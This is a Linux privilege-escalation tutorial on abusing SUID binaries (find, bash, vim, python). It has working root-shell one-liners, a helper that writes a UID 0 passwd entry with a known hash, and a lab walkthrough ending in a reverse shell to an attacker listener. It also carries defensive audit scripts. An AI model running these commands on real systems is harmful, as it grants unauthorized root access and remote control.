series of articles
Operating system privilege escalation (18) Linux privilege escalation - kernel privilege escalation
SUID privilege escalation
Introduction to SUID
SUID (set-user-ID) is a special permission bit. When a file with SUID set is executed, the resulting process runs with the effective user ID of the file's owner rather than that of the user who launched it. If the owner is root, the user who runs the program temporarily acts as root for as long as that process lives. SGID is the same idea applied to the group: the process runs with the effective group ID of the file's owning group. The passwd command is the classic example: it has to write /etc/shadow, which only root may modify, so /usr/bin/passwd is installed with the SUID bit set. In ls -l it shows as -rwsr-xr-x; the s in the owner's execute position is the SUID bit.
Note the following points:
- Only executable binary files can meaningfully carry SUID. The Linux kernel ignores the SUID bit on interpreted scripts (files that start with a #! line), so setting it on a shell script changes nothing.
- The user running the command must have execute (x) permission on the file.
- While the program runs, the process has the effective UID of the file's owner; its real UID stays that of the caller. Some programs (bash is the important one) compare the two and drop the elevated effective UID unless told not to.
- SUID applies only for the lifetime of that process; the identity change ends when the program exits.
Set SUID
chmod u+s filename    set the SUID bit (chmod 4755 filename does the same numerically)
chmod u-s filename    remove the SUID bit
The principle of SUID privilege escalation
Principle: if a binary that is able to run other commands, open arbitrary files, or spawn a shell is installed with SUID and owned by root, any user allowed to execute it can drive it into running system commands with root's effective UID.
Common binaries that can be abused for privilege escalation when they carry the SUID bit:
nmap
vim
find
bash
more
less
nano
cp
awk
mv
Not all of these behave the same way. Some spawn a shell directly (find, bash, python, vim), others mainly give a root-level read or write of a file, which is then turned into a shell by editing /etc/passwd or a similar file. Two caveats worth knowing before trying them: bash drops the elevated effective UID at startup unless run with -p, and the nmap trick relies on its interactive mode, which exists only in nmap versions 2.02 to 5.21.
For more commands and the exact invocation for each, see: https://gtfobins.github.io
Find SUID files
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
One: find / -user root -perm -4000 -print 2>/dev/null
1. find is the command for finding files
2. / starts the search from the root directory
3. -user root: the file's owner is root
4. -perm -4000
-perm matches on the permission bits.
4000, 2000 and 1000 are the SUID, SGID and sticky bits respectively; they form a fourth, leading octal digit in front of the usual three.
1. For ordinary files the permission is written with three octal digits; 777 (rwxrwxrwx) is the maximum.
-perm -0777 matches only files that have every one of the rwxrwxrwx bits set.
-perm /0777 matches files that have any one of those bits set (older documentation writes this as -perm +0777, but the + form has been removed from GNU findutils; use / instead).
2. The special bits form the fourth digit; 7000 is the maximum, i.e. --s--s--t. The same rules apply:
-perm -7000 matches only files with all three special bits set (--s--s--t).
-perm /7000 matches files with any of them set: --s------ (4000), -----s--- (2000), --------t (1000), and so on.
So -perm -4000 selects exactly the files whose SUID bit is set, whatever their other bits are; -perm /6000 would select files that are either SUID or SGID.
5. -print prints each match; 2>/dev/null sends standard error (the "Permission denied" messages for directories you cannot read) to /dev/null so that only results are shown.
Two: find / -perm -u=s -type f 2>/dev/null
1. find is the command for finding files
2. / starts the search from the root directory
3. -perm -u=s is the symbolic form of the same test: the setuid bit (s in the user position) must be set
4. -type f restricts the search to regular files; -type b/d/c/p/l/f select block devices, directories, character devices, named pipes, symbolic links and regular files respectively
Three: find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
1. find is the command for finding files
2. / starts the search from the root directory
3. -user root: the file's owner is root
4. -perm -4000: the SUID bit is set
5. -exec ls -ldb {} \; runs ls -ldb on each match ({} is replaced by the path, \; terminates the command), so the output shows the full mode string, owner and size of each SUID file instead of only its path
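The three commands above are usually typed by hand and read by eye. As an added example that is not part of the original article, the shell functions below wrap the same find invocations into a small audit: list_suid enumerates SUID and SGID files under a directory (optionally only those owned by a given user), count_perm makes the difference between -perm -MODE and -perm /MODE visible, new_suid compares the result against a baseline list of expected paths, and gtfobins_hits flags files whose name appears in a constructed list of GTFOBins SUID entries. The baseline file, the GTFOBINS_SUID list and the sample directory are assumptions for the example; on a real host the baseline would come from a clean install of the same release and the search directory would be /.

```shell
#!/bin/sh
# Added example, not from the original article: a reusable SUID audit built on
# the find commands explained above. Needs GNU find (for -perm /MODE) plus the
# POSIX tools ls, awk, sort, grep and basename.

# Names that GTFOBins documents with a SUID technique. Constructed subset for
# this example; the authoritative list is https://gtfobins.github.io
GTFOBINS_SUID="bash sh dash find vim vi python python3 perl nmap less more nano cp mv awk env"

# list_suid DIR [OWNER]
# Print "mode owner path" for every regular file under DIR that has SUID or
# SGID set. -perm /6000 = either 4000 (SUID) or 2000 (SGID) is set;
# -perm -4000 would demand SUID specifically. OWNER, when given, keeps only
# files owned by that user (the article uses -user root).
list_suid() {
    dir=$1
    owner=${2:-}
    if [ -n "$owner" ]; then
        find "$dir" -type f -perm /6000 -user "$owner" -exec ls -ld {} \; 2>/dev/null
    else
        find "$dir" -type f -perm /6000 -exec ls -ld {} \; 2>/dev/null
    fi | awk '{ print $1, $3, $NF }' | sort -k3
}

# count_perm DIR PERMTEST
# Count regular files under DIR matching one find -perm argument. Used to show
# how -MODE (all listed bits required) differs from /MODE (any listed bit).
count_perm() {
    find "$1" -type f -perm "$2" 2>/dev/null | wc -l | tr -d ' '
}

# new_suid DIR BASELINE
# Print SUID/SGID paths under DIR that are absent from BASELINE, a file with
# one expected path per line. Anything printed here was added after install.
new_suid() {
    list_suid "$1" | awk '{ print $3 }' | grep -vxF -f "$2"
}

# gtfobins_hits DIR
# Print SUID/SGID paths under DIR whose base name is on the GTFOBins list.
gtfobins_hits() {
    list_suid "$1" | while read -r mode owner path; do
        name=$(basename "$path")
        for known in $GTFOBINS_SUID; do
            if [ "$name" = "$known" ]; then
                echo "$path"
                break
            fi
        done
    done
}
```

On a live system, `list_suid / root` reproduces the article's third command, `new_suid / /path/to/baseline.txt` shows what changed since install, and `gtfobins_hits /` narrows the list to binaries worth looking up. Setting the SUID bit on a file you own needs no privilege, so the functions can be exercised in a scratch directory before running them against /.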
Privilege escalation experiments
FIND privilege escalation
find is present on practically every system. Besides locating files it can run a command for each match (-exec), so if find is installed SUID root, every command it executes runs with an effective UID of root.
1. Find the SUID file
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
2. Use find to escalate privileges
touch anyfile                        # find needs a path that exists, otherwise -exec never fires
find anyfile -exec whoami \;         # prints root: the command ran with effective UID 0
find . -exec /bin/sh -p \; -quit     # spawn a shell; -p stops bash from dropping the elevated effective UID, -quit ends the search after the first match so only one shell is started
BASH privilege escalation
bash starts a shell, so a SUID root bash would let every command typed into it run as root. There is one catch: at startup bash compares its real and effective UIDs and, if they differ, resets the effective UID to the real one, so plain bash would hand back an ordinary unprivileged shell. The -p (privileged mode) option disables that check.
1. Find the SUID file
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
2. Use bash to escalate privileges
bash -p
In the resulting shell, id shows the original uid alongside euid=0(root), and whoami (which reports the effective UID) prints root.
VIM privilege escalation
A SUID root vim can write any file as root. That gives two routes: edit /etc/passwd and /etc/shadow to add a user with UID 0, or drop straight to a shell from inside vim.
1. Find the SUID file
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
2. Use vim to escalate privileges
The first way is to use vim to add an account
vim /etc/passwd      # add a privileged user
append: bob:x:0:0::/home/bob:/bin/bash
vim /etc/shadow      # add the matching shadow entry
bob:$1$salt$638tR8bROOvPnPklDQ9Vf/:19103:0:99999:7:::    # the password is 123456 (a $1$ md5crypt hash, the kind openssl passwd -1 produces)
Finally switch to the bob user with su bob; because bob's UID is 0, the shell it gives is a root shell.
The second is to use vim to open an interactive shell. This relies on vim being built with Python support (check vim --version for +python or +python3, and use :py3 instead of :py on Python-3-only builds):
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
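As an added example that is not from the original article, the functions below cover the /etc/passwd route from both sides. make_root_entry builds a complete passwd line for a new UID 0 account with the hash placed in the password field itself, so only /etc/passwd has to be written: when that field holds anything other than x, pam_unix authenticates against it and never consults /etc/shadow, which removes the second edit from the procedure above. uid0_accounts and has_extra_uid0 are the matching checks a defender runs over /etc/passwd to spot any account besides root with UID 0. The account name bob, the use of openssl passwd -6 (a SHA-512 crypt hash) and the sample passwd content are assumptions constructed for the example.

```shell
#!/bin/sh
# Added example, not from the original article.

# make_root_entry USER PASSWORD
# Print a /etc/passwd line for USER with UID 0, GID 0 and the password hash in
# field 2, so the account works without touching /etc/shadow.
# Assumes openssl is installed; -6 selects SHA-512 crypt with a random salt.
make_root_entry() {
    user=$1
    pass=$2
    hash=$(openssl passwd -6 "$pass")
    printf '%s:%s:0:0::/home/%s:/bin/bash\n' "$user" "$hash" "$user"
}

# uid0_accounts PASSWD_FILE
# Print every account in PASSWD_FILE whose UID is 0, followed by where its
# password lives: "shadow" when field 2 is x, otherwise "passwd" (a hash was
# written directly into the passwd file, the trick used above).
uid0_accounts() {
    awk -F: '$3 == 0 { print $1, ($2 == "x" ? "shadow" : "passwd") }' "$1"
}

# has_extra_uid0 PASSWD_FILE
# Succeed (exit 0) when some account other than root has UID 0.
has_extra_uid0() {
    [ -n "$(awk -F: '$3 == 0 && $1 != "root"' "$1")" ]
}

# Constructed sample: a minimal passwd file plus the bob line the article adds.
SAMPLE_PASSWD=$(printf '%s\n' \
    'root:x:0:0:root:/root:/bin/bash' \
    'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
    'daoer:x:1000:1000::/home/daoer:/bin/bash' \
    'bob:x:0:0::/home/bob:/bin/bash')

# Stand-alone demo: audit the sample instead of the real /etc/passwd.
demo_file=$(mktemp)
printf '%s\n' "$SAMPLE_PASSWD" > "$demo_file"
echo "UID 0 accounts in sample:"
uid0_accounts "$demo_file"
rm -f "$demo_file"
```

To audit a real host, run `uid0_accounts /etc/passwd`; the only expected line is `root shadow`. A second UID 0 name, or a `passwd` marker on any line, is exactly the trace this escalation leaves behind.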
PYTHON privilege escalation
Python does not drop privileges on its own, so a SUID root python can exec a shell directly; -p is passed to the shell so that bash, if that is what /bin/sh resolves to, keeps the elevated effective UID.
1. Find the SUID file
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
2. Exploit it
python -c 'import os;os.execl("/bin/sh", "sh", "-p")'
For more background on SUID privilege escalation, see the article "Talking about Linux and SUID privilege escalation".
Combat simulation
machine name | IP |
---|---|
kali | 192.168.0.105 |
Ubuntu | 192.168.41.27 |
Earlier in the engagement the Ubuntu machine was compromised by other means, and the shell obtained runs as the ordinary user daoer.
Next we use SUID to escalate privileges
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
Among the results, look for binaries known to be exploitable when SUID; on this target, find is one of them:
touch anyfile                        # find needs a path that exists
find anyfile -exec whoami \;         # prints root, confirming the SUID bit is honoured
find . -exec /bin/sh -p \; -quit     # root shell (effective UID 0)
With the root shell in hand, kali starts a listener and the target sends back a reverse shell:
nc -lvvp 8888                                          # on kali
bash -p -i >& /dev/tcp/192.168.0.105/8888 0>&1         # on the target, from the root shell
The -p matters here too: a bash started from a process whose effective UID differs from its real UID drops the effective UID at startup, so without -p the reverse shell would arrive as daoer rather than root. The /dev/tcp redirection is a bash feature; if the shell find spawned is dash (what /bin/sh is on Ubuntu), wrap the command as bash -p -c 'bash -p -i >& /dev/tcp/192.168.0.105/8888 0>&1'.
The kali machine receives the reverse shell; running id in it shows daoer's uid together with euid=0(root).